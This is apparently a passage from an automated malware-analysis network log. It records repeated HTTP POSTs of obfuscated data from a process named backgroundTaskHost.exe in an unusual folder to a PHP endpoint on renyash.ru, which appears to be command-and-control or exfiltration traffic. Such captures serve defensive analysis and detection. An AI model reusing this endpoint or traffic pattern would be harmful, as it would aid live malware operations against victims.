                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zewC2oW4EDb42nUT2%2FIuDUofampEKEB8x7cJTiBOhzu5qtNbvuAv5EYnWbZy2hZuhvWF0uDGi72yf%2B5weMH9Fy6IiGAYF6gwAPGajSjtnjW9FFlXISbQMVQCfNb4XExIOIlLsnIa"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e393e557d1a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4715&min_rtt=1989&rtt_var=6198&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=61352&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          100192.168.2.450108104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:00.705059052 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:01.061202049 CET2520OUTData Raw: 54 5f 5b 50 50 59 5f 51 5c 5b 52 58 57 5f 58 5e 58 51 5a 5c 52 51 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_[PPY_Q\[RXW_X^XQZ\RQQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)*7"(:%?*<]!-*0=+W4.-+,0(@'4>>Z*!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:01.150696039 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:01.411451101 CET813INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:01 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thVK2uhXzIkvU%2B3K9scgX6h59BnG77GMkYzfZAR4vQjTbPiZSIi3pRVfT9%2Be%2F2kYpL6LlgmTKfrrpAHvCVhnamhsFwmZVNdE1i%2FLrJVRCKmfXNM%2ForNxafrwuKr%2BU%2B1OEn4dEnIu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e3dec227c6a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2365&min_rtt=1860&rtt_var=1708&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=247289&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          101192.168.2.450109104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:01.532911062 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:01.889364004 CET2520OUTData Raw: 54 50 5e 57 55 58 5f 54 5c 5b 52 58 57 5b 58 58 58 51 5a 5d 52 55 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP^WUX_T\[RXW[XXXQZ]RUQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E=9#E (&/)Z96507 ></#(3[4=!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:01.997416973 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:02.256860971 CET811INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5xCW5EEvnxK%2FO3X2mpPZaWi%2BKNnVpFYmJovxDDS%2FxAeamOtQIS1VL6H1dBzbi%2FrL9nzLCrk4Z8g%2F44DCvR0q3H3OPaT7FY%2FBxL7wcJTADGyRF09PjWSzd6eAdkOxsCe73M4mbn7u"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e432d990fa0-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2895&min_rtt=1619&rtt_var=3160&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=123404&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          102192.168.2.450110104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:02.407355070 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:02.764400959 CET2520OUTData Raw: 51 5d 5e 5f 55 53 5f 50 5c 5b 52 58 57 59 58 58 58 57 5a 5b 52 50 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q]^_US_P\[RXWYXXXWZ[RPQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=:3C ;5'0(=,&"%]'-$ ..Q(Z8(5 "="_*!Y#!Y,*
                                                                                          Jan 4, 2025 11:09:02.851553917 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:03.069988966 CET799INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYb8YiPo9pVvdnEE4oglGM5ff5GpcHzhstGJ8KQE98XDooO3BCesZiKIhyjEfWDegET2zLbwMFDJE7Wb6Ow4IlZDfuEf9caqK9fbcI9DP9oddXHwLBtv4ml1hE6JtCrulxrwoOlk"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e488c0c8c06-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2594&min_rtt=1993&rtt_var=1951&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=214453&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          103192.168.2.450111104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:03.191826105 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:03.545697927 CET2520OUTData Raw: 54 5f 5b 53 55 5c 5f 56 5c 5b 52 58 57 53 58 5f 58 57 5a 5e 52 5c 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_[SU\_V\[RXWSX_XWZ^R\QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C*4;!%/*1X6.%]$=;#:R<< <87>1>!Y#!Y,
                                                                                          Jan 4, 2025 11:09:03.813927889 CET25INHTTP/1.1 100 Continue


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          104192.168.2.450112104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:03.814786911 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:04.170648098 CET1844OUTData Raw: 51 5a 5b 54 55 59 5a 54 5c 5b 52 58 57 5f 58 5b 58 50 5a 52 52 52 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ[TUYZT\[RXW_X[XPZRRRQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)_+A4P1/^(?9Z5>0<#=*(/;_+#"=X++!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:04.267805099 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:04.449250937 CET955INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XjjipuQkdYPF22aL%2FciyEMKhc3023fsenVY657RkN2SFvwEJ%2BbpYC1VXSzbp%2FOL6zR7ON678RqgLVkeDp2MuHmr46dQBslIHXWFOvxRhwRhUIA77x1XWp%2FQYp1XjyDY1QJDtXHgn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e516ee1436c-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4127&min_rtt=1766&rtt_var=5384&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=70688&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0a 2b 2e 33 09 36 3c 33 03 29 10 26 5f 25 33 20 58 3b 31 2f 5e 23 5a 3b 5f 38 54 25 10 24 23 20 5c 29 06 2c 13 20 56 3f 51 30 20 2a 5d 06 12 3b 02 28 02 3d 05 31 5d 2e 1e 28 21 21 1b 27 26 36 5f 24 2e 3f 5a 28 02 29 5a 32 3c 1b 56 29 59 29 02 3a 2a 09 19 38 3c 02 51 20 29 21 53 08 13 23 0f 25 0f 2b 52 3e 09 29 58 26 0d 32 03 30 3a 2b 1c 29 28 34 53 27 58 32 16 39 21 02 02 28 30 20 58 3a 10 38 5e 3f 07 3c 09 25 2c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'+.36<3)&_%3 X;1/^#Z;_8T%$# \), V?Q0 *];(=1].(!!'&6_$.?Z()Z2<V)Y):*8<Q )!S#%+R>)X&20:+)(4S'X29!(0 X:8^?<%,"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          105192.168.2.450113104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:03.899383068 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:04.248646021 CET2520OUTData Raw: 54 5a 5e 53 50 5b 5f 50 5c 5b 52 58 57 5b 58 5f 58 57 5a 5e 52 5d 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^SP[_P\[RXW[X_XWZ^R]Q]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.**?#+5&07*1Z6=2'.!-"V(,?7\7>9>+!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:04.358613968 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:04.535705090 CET804INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6ZlZGr3JiddSLJvRxw%2B319AyJGYRXNECY%2FQ4IiWYcf3IX7mzf1Uu%2BdKu0asSoZkdd0Bby7oahKtza3nLYOcLjMd2wXIcG5yxnA0doAnDHOq9snU8oPzYc2WRNRWHrGDtqdobglq"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e51fef34378-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4580&min_rtt=1664&rtt_var=6457&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=58404&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          106192.168.2.450114104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:04.660221100 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:05.014300108 CET2520OUTData Raw: 54 5b 5b 52 50 59 5a 52 5c 5b 52 58 57 58 58 5e 58 5d 5a 58 52 54 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[[RPYZR\[RXWXX^X]ZXRTQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.):3C4& ;*&5=Y3.7V#-*P<3*%#"-=>+!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:05.123142958 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:05.300973892 CET798INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i0DjtsXsydv9Al3JrrJH1PTNIfJjykZBKTEkXyHpsZjVUdTIfaJfq2pTe43B6X6cPDKrRjsEQrhe7bD5wBwKENOU0RaCHgGelV5IlbxXQy6G4tLS0XiY7iRGBbT9OIwTfG00YT9A"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e56bfbc7ca0-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5058&min_rtt=1928&rtt_var=6984&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=54128&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          107192.168.2.450115104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:05.420993090 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:05.780014038 CET2520OUTData Raw: 51 5b 5e 50 55 5d 5f 54 5c 5b 52 58 57 5d 58 5d 58 53 5a 5d 52 57 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q[^PU]_T\[RXW]X]XSZ]RWQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*7 ;!2#><*!)['.; >(<,*&;7)!Y#!Y,
                                                                                          Jan 4, 2025 11:09:05.885885954 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:06.342497110 CET810INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x6L4zF4HtmG4vaWz7Xe583HeltFiKg7TTIN2uap2H1bn9brw%2FOGuba6QK7O8DKB0lfYhdBD5Tj1Lzszt%2B8BIosJb3K5mDpvYPa26Mp%2FzW1alls%2FsXFZ%2BA5pxNtLrQaYlQk%2BGxlI1"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e5b7fa07ca6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3564&min_rtt=1977&rtt_var=3917&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=99455&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0
                                                                                          Jan 4, 2025 11:09:06.374130011 CET810INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x6L4zF4HtmG4vaWz7Xe583HeltFiKg7TTIN2uap2H1bn9brw%2FOGuba6QK7O8DKB0lfYhdBD5Tj1Lzszt%2B8BIosJb3K5mDpvYPa26Mp%2FzW1alls%2FsXFZ%2BA5pxNtLrQaYlQk%2BGxlI1"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e5b7fa07ca6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3564&min_rtt=1977&rtt_var=3917&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=99455&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          108192.168.2.450116104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:06.471796989 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:06.826807022 CET2516OUTData Raw: 54 5e 5e 57 55 52 5a 57 5c 5b 52 58 57 5a 58 52 58 52 5a 59 52 51 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^^WURZW\[RXWZXRXRZYRQQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C*A 1V'3?X=!Y"%03V4+,/Y<".%)!Y#!Y,
                                                                                          Jan 4, 2025 11:09:06.925226927 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:07.102653980 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=03NTqa7M3pvn4jBdbL%2B3LvH8wlLsc1qpR0HejMJFrpI3xzIxwryiAU5nc%2BuFaWNbjogAy9iyNRg496bct2DV8Kw%2FYIsqdxwefWurjav17XCPchJpHCI3DEfsmB%2FvbeMbUAhbPS3S"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e61fb5a7d00-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4204&min_rtt=1952&rtt_var=5236&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=73109&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          109192.168.2.450117104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
